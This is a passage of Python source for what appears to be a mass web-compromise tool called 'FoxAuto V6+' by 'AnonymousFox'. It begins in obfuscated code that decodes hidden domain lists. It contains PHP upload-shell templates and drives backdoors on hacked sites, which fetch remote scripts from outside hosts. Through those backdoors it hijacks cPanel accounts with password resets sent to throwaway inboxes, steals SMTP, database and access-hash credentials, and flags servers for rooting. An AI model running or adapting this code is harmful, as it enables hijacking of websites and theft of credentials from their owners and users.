+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]))),_____________bgsgtttfdbfg)):
___________onielzvjdokg=re.findall(re.compile(str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]))),_____________bgsgtttfdbfg)
else :
getError((_vsqmdgoqxczl**_vsqmdgoqxczl))
return (()==[])
____________gwbahwaesaqz=re.findall(re.compile(str("".join(chr(__RSV) for __RSV in [(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+____nthikhotjssa+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+______ttwxoebqsbsu),((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu),((((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),((_vsqmdgoqxczl**_vsqmdgoqxczl)+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+______ttwxoebqsbsu),(____nthikhotjssa+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbxg+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+____nthikhotjssa+______ttwxoebqsbsu)]))),_____________bgsgtttfdbfg)
except :
getError((_vsqmdgoqxczl**_vsqmdgoqxczl))
return (()==[])
def log() :
log = """
{}[#]{} Create By ::
{} ___ ______
{} / _ \ | ___|
{}/ /_\ \_ __ ___ _ __ _ _ _ __ ___ ___ _ _ ___ | |_ _____ __
{}| _ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __|| _/ _ \ \/ /
{}| | | | | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \| || (_) > <
{}\_| |_/_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/\_| \___/_/\_\
{} __/ |
{} |___/ {}FoxAuto {}V6+ {}[Priv8]
""".format(fr, fw, fg, fr, fg, fr, fg, fr, fg, fr, fw, fg, fr)
for line in log.split("\n"):
print(line)
time.sleep(0.15)
headers = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': 'bing.com'}
def shellFox():
try:
global shell_Fox
global checkups
for d in ____________gwbahwaesaqz :
try:
shell_Fox = requests.get('https://{}/_@files/php/FoxAutoV6Plus.txt'.format(d), headers=headers, timeout=15)
shell_Fox = content_Fox(shell_Fox)
except :
shell_Fox = ''
if ('FoxAuto' in shell_Fox):
checkups = shell_Fox
break
if ('FoxAuto' not in shell_Fox):
getError(0)
exit(0)
except :
getError(0)
exit(0)
testSendA = """
<?php
error_reporting(0);
?>
Upload is <b><color>WORKING</color></b><br>
Check Mailling ..<br>
<form method="post">
<input type="text" placeholder="E-Mail" name="email" value="<?php print $_POST['email']?>"required ><input type="text" placeholder="Order ID" name="orderid" value="<?php print $_POST['orderid']?>" ><br>
<input type="submit" value="Send test >>">
</form>
<br>
<?php
if (!empty($_POST['email'])){
if (!empty($_POST['email'])){
$xx =$_POST['orderid'];
}
else{
$xx = rand();
}
mail($_POST['email'],"Result Report Test - ".$xx,"WORKING ! FoxAuto V6+");
print "<b>send an report to [".$_POST['email']."] - Order : $xx</b>";
}
?>
"""
testSendB = """
<?php
error_reporting(0);
?>
Upload is <b><color>WORKING</color></b><br>
Check Mailling ..<br>
<form method="post">
<input type="text" placeholder="E-Mail" name="email" value="<?php print $_POST['email']?>"required ><input type="text" placeholder="Order ID" name="orderid" value="<?php print $_POST['orderid']?>" ><br>
<input type="submit" value="Send test >>">
</form>
<br>
<?php
if ($_GET['Ghost'] =='send'){
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo "Upload ";
if (move_uploaded_file
($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;
else echo "failed";
}
echo "
<form name='uplform' method='post' action='?Ghost=send'
enctype='multipart/form-data'>
<p align='center'>
<input type='file' name='userfile'>
<input type='submit'>
</p>
";
}
if (!empty($_POST['email'])){
if (!empty($_POST['email'])){
$xx =$_POST['orderid'];
}
else{
$xx = rand();
}
mail($_POST['email'],"Result Report Test - ".$xx,"WORKING ! FoxAuto V6+");
print "<b>send an report to [".$_POST['email']."] - Order : $xx</b>";
}
?>
"""
def changemail_Fox():
try :
session = requests.session()
payload = {"f": "get_email_address"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload)
email_Fox = r.json()["email_addr"]
return email_Fox, session.cookies
except :
return False
def checkinbox(cookies,user):
Scode_F0x = 'AnonymousFox'
try :
cookies={"PHPSESSID":cookies}
session = requests.session()
payload_Fox = {"f": "set_email_user", "email_user":user, "lang":"en"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload_Fox, cookies=cookies)
payload_Fox = {"f": "check_email", "seq": "1"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload_Fox, cookies=cookies)
for email in r.json()["list"]:
if ('cpanel' in email["mail_from"]):
email_id = email["mail_id"]
payload_Fox = {"f": "fetch_email", "email_id": email_id}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload_Fox, cookies=cookies)
Scode_F0x = r.json()['mail_body'].split('<p style="border:1px solid;margin:8px;padding:4px;font-size:16px;width:250px;font-weight:bold;">')[1].split('</p>')[0]
payload_Fox = {"f": "del_email","email_ids[]":int(email_id)}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload_Fox, cookies=cookies)
else :
Scode_F0x = 'AnonymousFox'
return Scode_F0x
except :
return Scode_F0x
def checkinboxTestPHP(cookies, user, code):
rz = 'bad'
try :
cookies={"PHPSESSID":cookies}
session = requests.session()
payload = {"f": "set_email_user", "email_user":user, "lang":"en"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload, cookies=cookies)
payload = {"f": "check_email", "seq": "1"}
r = session.get("http://api.guerrillamail.com/ajax.php", params=payload, cookies=cookies)
for email in r.json()["list"]:
if (str(code) in email["mail_subject"]):
rz = 'good'
else :
rz = 'bad'
return rz
except :
return rz
def resetPassword(backdor, urlShell, t) :
try :
print(' {}[*] Reset Password ..... {}(Waiting)'.format(fw, fr))
token = random_Fox(3)+'Fox'+random_Fox(3)
post0 = {'resetlocal': token, 'get3': 'get3', 'token':t, 'act':'AnonymousFox'}
try :
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post0, headers=headers, timeout=15)
except:
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post0, headers=headers, timeout=30)
check = content_Fox(check)
if ('Error-one' in check):
print(' {}[-] There is no cPanel.'.format(fr))
elif ('Error-two' in check):
print(' {}[-] Reset Password Disabled.'.format(fr))
elif ('<cpanel>' in check):
cpanelRt = re.findall(re.compile(':2083\|(.*)</cpanel>'), check)[0]
domain = re.findall(re.compile('https://(.*):2083\|'), check)[0]
print(' {}[+] Succeeded.\n - {}https://{}:2083|{}'.format(fg, fr, domain, cpanelRt))
open('Results/cPanel_Reset.txt', 'a').write('https://{}:2083|{}'.format(domain, cpanelRt) + '\n')
else :
src = str(changemail_Fox())
email = re.findall(re.compile('\'(.*)\', <RequestsCookieJar'), src)[0]
cookies = re.findall(re.compile('name=\'PHPSESSID\', value=\'(.*)\', port='), src)[0]
post1 = {'email': email, 'get': 'get'}
try :
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post1,headers=headers, timeout=15)
except:
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post1, headers=headers, timeout=30)
time.sleep(10)
code = checkinbox(cookies, email)
start = timer()
while ((code == 'AnonymousFox') and ((timer() - start) < 90)):
time.sleep(30)
code = checkinbox(cookies, email)
if (code == 'AnonymousFox') :
print(' {}[-] Reset Password Failed\n {}[!] Try {}[Semi-Automatic]'.format(fr, fw, fr))
open('Results/Try_Rest_cPanel_Semi_Automatic.txt', 'a').write('{}\n'.format(urlShell))
else :
post2 = {'code': code, 'get2': 'get2'}
try :
check2 = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=30)
except:
check2 = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=30)
check2 = content_Fox(check2)
if ('<cpanel>' in check2) :
cpanelRt = re.findall(re.compile(':2083\|(.*)</cpanel>'), check2)[0]
domain = re.findall(re.compile('https://(.*):2083\|'), check2)[0]
print(' {}[+] Succeeded.\n - {}https://{}:2083|{}'.format(fg, fr, domain, cpanelRt))
open('Results/cPanel_Reset.txt', 'a').write('https://{}:2083|{}'.format(domain, cpanelRt) + '\n')
else :
print(' {}[-] Reset Password Failed\n {}[!] Try {}[Semi-Automatic]'.format(fr, fw, fr))
open('Results/Try_Rest_cPanel_Semi_Automatic.txt', 'a').write('{}\n'.format(urlShell))
except :
print(' {}[-] Reset Password Failed\n {}[!] Try {}[Semi-Automatic]'.format(fr, fw, fr))
open('Results/Try_Rest_cPanel_Semi_Automatic.txt', 'a').write('{}\n'.format(urlShell))
def resetPassword2(backdor, urlShell, email) :
try :
print(' {}[*] Reset Password ..... {}(Waiting)'.format(fw, fr))
post = {'email': email, 'get': 'get'}
try :
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
check = content_Fox(check)
if ('Error-one' in check):
print(' {}[-] There is no cPanel.'.format(fr))
elif ('Error-two' in check):
print(' {}[-] Reset Password Disabled.'.format(fr))
elif ('./Done' in check):
print(' {}[+] The system sent the security code to your email.'.format(fg))
code = str(input_Fox(' {}[!] Enter the security code:{} '.format(fw, fr))).strip()
if(code == ''):
print(' {}[-] The code is wrong.'.format(fr))
open('Results/Try_Rest_cPanel_manually.txt', 'a').write('{}\n'.format(urlShell))
return
post2 = {'code': code, 'get2': 'get2'}
try :
check2 = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=15)
except:
check2 = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=30)
check2 = content_Fox(check2)
if ('<cpanel>' in check2):
cpanelRt = re.findall(re.compile(':2083\|(.*)</cpanel>'), check2)[0]
domain = re.findall(re.compile('https://(.*):2083\|'), check2)[0]
print(' {}[+] Succeeded.\n - {}https://{}:2083|{}'.format(fg, fr, domain, cpanelRt))
open('Results/cPanel_Reset.txt', 'a').write('https://{}:2083|{}'.format(domain, cpanelRt) + '\n')
else :
print(' {}[-] Reset Password Failed.'.format(fr))
open('Results/Try_Rest_cPanel_manually.txt', 'a').write('{}\n'.format(urlShell))
except:
print(' {}[-] Reset Password Failed.'.format(fr))
open('Results/Try_Rest_cPanel_manually.txt', 'a').write('{}\n'.format(urlShell))
def finderSMTP(backdor) :
try :
post = {'finderSMTP': 'AnonymousFox'}
print(' {}[*] Finder SMTP ..... {}(Waiting)'.format(fw, fr))
try :
finderSMTP = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
finderSMTP = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
finderSMTP = content_Fox(finderSMTP)
if ('Error-SMTP' in finderSMTP) :
print(' {}[-] Another hacker has already withdraw it.'.format(fr))
elif ('<findersmtp>' in finderSMTP) :
if (re.findall(re.compile('<findersmtp>(.*)</findersmtp>'), finderSMTP)):
SMTPs = re.findall(re.compile('<findersmtp>(.*)</findersmtp>'), finderSMTP)
print(' {}[+] Succeeded'.format(fg))
for SMTP in SMTPs:
if ('!!' in SMTP) :
SMTP = SMTP.replace("!!", "@")
print(' {}- {}{}'.format(fg, fr, SMTP))
open('Results/SMTPs.txt', 'a').write(SMTP + '\n')
else :
print(' {}[-] There is no SMTP.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def getSMTP(backdor) :
try :
post = {'getSMTP': 'AnonymousFox'}
print(' {}[*] Create SMTP ..... {}(Waiting)'.format(fw, fr))
try :
getSMTP = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
getSMTP = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
getSMTP = content_Fox(getSMTP)
if ('<smtp>' in getSMTP) :
smtpC = re.findall(re.compile('<smtp><domain>Domian => (.*)</domain><port><br>Port => (.*)</port><smtpname><br>SMTPname => (.*)</smtpname><password><br>Password => (.*)</password></smtp>'),getSMTP)[0]
smtp = '{}|{}|{}@{}|{}'.format(smtpC[0], smtpC[1], smtpC[2], smtpC[0], smtpC[3])
print(' {}[+] Succeeded.\n - {}{}'.format(fg, fr, smtp))
open('Results/SMTPs_Create.txt', 'a').write(smtp + '\n')
else :
print(' {}[-] There is no WebMail.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def finderScript(backdor, shell) :
try :
print(' {}[*] Finder Script ..... {}(Waiting)'.format(fw, fr))
post = {'pwd': 'AnonymousFox'}
try :
srcServerFox = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
srcServerFox = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
srcServerFox = content_Fox(srcServerFox)
uname = re.findall(re.compile('<uname><font color="red"><center>(.*)</center> </font><br></uname>'), srcServerFox)[0]
pwd = re.findall(re.compile('<pwd><font color="blue"><center>(.*)</center></font><br></pwd>'), srcServerFox)[0]
print(' {}[U] '.format(fm) + uname)
print(' {}[P] '.format(fm) + pwd)
open('Results/pwd_uname_servers.txt', 'a').write('{}\n{}\n{}\n-----------------------------------------------------------------------------------------------------\n'.format(uname, pwd, shell))
if ('[-] Windows' in srcServerFox):
print(' {}[S] Windows server.'.format(fr))
open('Results/Windows_servers.txt', 'a').write('{}\n'.format(shell))
else:
print(' {}[S] Linux server.'.format(fg))
if (' 2015 ' in uname or ' 2014 ' in uname or ' 2013 ' in uname or ' 2012 ' in uname or ' 2011 ' in uname or ' 2010 ' in uname) :
open('Results/Roots_servers.txt', 'a').write('{}\n'.format(shell))
elif (' 2016 ' in uname):
if (' Dec ' not in uname and ' Nov ' not in uname):
open('Results/Roots_servers.txt', 'a').write('{}\n'.format(shell))
if ('[+] cPanel' in srcServerFox):
print(' {}[+] cPanel script.'.format(fg))
open('Results/cPanels_servers.txt', 'a').write('{}\n'.format(shell))
elif ('[+] vHosts' in srcServerFox):
print(' {}[+] vHosts script.'.format(fg))
open('Results/vHosts_servers.txt', 'a').write('{}\n'.format(shell))
except:
print(' {}[-] Failed.'.format(fr))
def accesshash(backdor, shell) :
try:
print(' {}[*] Accesshash + .my.cnf ..... {}(Waiting)'.format(fw, fr))
post = {'acc': 'AnonymousFox'}
try :
checkacc = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
checkacc = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
checkacc = content_Fox(checkacc)
if ('[+] Accesshash' in checkacc) :
print(' {} -{} {} => {}[{}Accesshash{}]'.format(fr, fg, shell, fr, fg, fr))
open('Results/accesshash.txt', 'a').write('{}?php={}/_@files/php/accesshash.txt\n'.format(backdor, dom))
exploitAcesshash(backdor)
else :
print(' {} - {} => [Not Found Accesshash]'.format(fr, shell))
if ('[+] mycnf' in checkacc) :
print(' {} -{} {} => {}[{}Mycnf{}]'.format(fr, fg, shell, fr, fg, fr))
open('Results/mycnf.txt', 'a').write('{}?php={}/_@files/php/mycnf.txt\n'.format(backdor, dom))
else :
print(' {} - {} => [Not Found Mycnf]'.format(fr, shell))
except:
print(' {}[-] Failed.'.format(fr))
def getConfig(backdor, shell):
try :
sh_path = shellPath_Fox(backdor, 'Fox-C/', 1)
post = {'config': 'AnonymousFox'}
print(' {}[*] Trying get Config ..... {}(Waiting)'.format(fw, fr))
try :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=180)
except :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=240)
getConfig = content_Fox(getConfig)
if ('Error-Config' in getConfig) :
print(' {}[-] CageFS (CloudLinux).'.format(fr))
sh_path = getConfigCFS(backdor, shell)
if (sh_path is False) :
return False
else :
return sh_path
try :
checkConfig = requests.get(sh_path, headers=headers, timeout=120)
except :
checkConfig = requests.get(sh_path, headers=headers, timeout=150)
checkConfig = content_Fox(checkConfig)
if ('Index of' in checkConfig) :
print(' {}[+] Config => {}{}'.format(fg, fr, sh_path))
print(' {}[*] Trying Check Scripts ..... {}(Waiting)'.format(fw, fr))
getscript_str = str(getscript(backdor, sh_path, shell))
if (getscript_str == 'Problem101') :
print(' {}[-] Please , Check form this manually'.format(fr))
return False
elif (getscript_str == 'Problem404') :
print(' {}[-] 404 Config.'.format(fr))
sh_path = getConfig404(backdor, shell)
if (sh_path is False):
return False
else :
return sh_path
else :
print(getscript_str)
return sh_path
else :
print(' {}[-] Failed.'.format(fr))
return False
except:
print(' {}[-] Failed.'.format(fr))
return False
def getConfig404(backdor, shell):
try :
sh_path = shellPath_Fox(backdor, 'Fox-C404/', 1)
post = {'config404': 'AnonymousFox'}
print(' {}[*] Trying get config{}404{} ..... {}(Waiting)'.format(fw, fr, fw, fr))
try :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=180)
except :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=240)
try :
checkConfig = requests.get(sh_path, headers=headers, timeout=120)
except :
checkConfig = requests.get(sh_path, headers=headers, timeout=150)
checkConfig = content_Fox(checkConfig)
if ('Index of' in checkConfig) :
print(' {}[+] Config => {}{}'.format(fg, fr, sh_path))
print(' {}[*] Trying Check Scripts ..... {}(Waiting)'.format(fw, fr))
getscript_str = str(getscript404(backdor, sh_path, shell))
print(getscript_str)
if ('There is no Config.' not in getscript_str) :
return sh_path
else :
return False
else :
print(' {}[-] Failed.'.format(fr))
return False
except:
